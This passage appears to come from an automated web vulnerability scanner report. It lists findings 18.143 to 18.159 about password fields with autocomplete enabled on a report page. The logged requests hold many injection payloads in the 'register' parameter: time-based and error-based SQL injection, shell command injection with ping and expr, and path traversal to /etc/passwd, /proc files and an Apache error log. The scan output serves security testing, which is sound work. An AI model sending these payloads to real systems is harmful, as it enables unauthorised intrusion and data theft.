<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.143. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.144. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.145. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.146. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.147. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302e62600f5f7a4b68;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.148. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.149. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.150. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.151. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.152. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.153. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.154. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.155. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.156. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.157. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.158. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.159. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
